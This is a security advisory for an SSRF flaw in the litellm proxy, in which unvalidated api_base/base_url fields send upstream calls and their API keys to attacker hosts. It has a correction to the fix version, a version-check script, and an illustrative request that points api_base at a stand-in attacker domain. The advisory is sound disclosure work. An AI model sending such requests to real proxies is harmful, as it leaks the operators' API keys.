Safety vulnerability ID: 73303
The information on this page was manually curated by our Cybersecurity Intelligence Team.
Affected versions of the litellm package are vulnerable to Server-Side Request Forgery (SSRF) attacks due to insufficient validation of request body parameters. The api_base and base_url fields in POST /chat/completions requests are not properly restricted, allowing attackers to redirect server-side API calls to attacker-controlled domains.
This vulnerability permits malicious users to exfiltrate sensitive data—including OpenAI API keys—by proxying requests through untrusted endpoints. Exploitation may result in unauthorized access to third-party services, data leakage, or misuse of exposed secrets.
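For illustration only, a request abusing this behavior might look like the sketch below. The proxy URL, virtual key, and attacker domain are hypothetical placeholders, and the exact request shape depends on how the litellm proxy is deployed; this is a sketch of the attack pattern described above, not a verified exploit.

```python
import requests  # any HTTP client works; requests is assumed to be installed

# Hypothetical litellm proxy endpoint and virtual key (illustrative values only)
PROXY_URL = "http://vulnerable-proxy.example.com:4000/chat/completions"
VIRTUAL_KEY = "sk-proxy-virtual-key"

# On affected versions, an unrestricted api_base/base_url in the request body
# can redirect the proxy's upstream call, along with the credentials it attaches,
# to a host the attacker controls.
payload = {
    "model": "gpt-3.5-turbo",
    "messages": [{"role": "user", "content": "hello"}],
    "api_base": "https://attacker.example.com/v1",  # attacker-controlled upstream
}

resp = requests.post(
    PROXY_URL,
    headers={"Authorization": f"Bearer {VIRTUAL_KEY}"},
    json=payload,
    timeout=30,
)
print(resp.status_code, resp.text)
```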
**Advisory Correction Notice:**
The original advisory states that this vulnerability was fixed in version v1.44.8. However, following a thorough analysis, Safety's Cyber Research team has confirmed that the fix is actually available only in versions v1.44.9 and later. The fix was introduced in this [commit](https://github.com/BerriAI/litellm/commit/ba1912afd1b19e38d3704bb156adf887f91ae1e0), and this notice corrects the version information implied by the original advisory.
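As a quick way to confirm whether an environment is on a fixed release, a minimal version check might look like the sketch below (the `packaging` library is assumed to be installed; the threshold reflects the corrected fix version from this notice):

```python
from importlib.metadata import version, PackageNotFoundError
from packaging.version import Version

FIXED_VERSION = Version("1.44.9")  # first release containing the fix, per the correction above

try:
    installed = Version(version("litellm"))
except PackageNotFoundError:
    print("litellm is not installed")
else:
    if installed < FIXED_VERSION:
        print(f"litellm {installed} is affected; upgrade to >= {FIXED_VERSION}")
    else:
        print(f"litellm {installed} includes the fix")
```

In a requirements file, the equivalent constraint would be `litellm>=1.44.9`.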
Latest version: 1.77.4
Library to easily interface with LLM API providers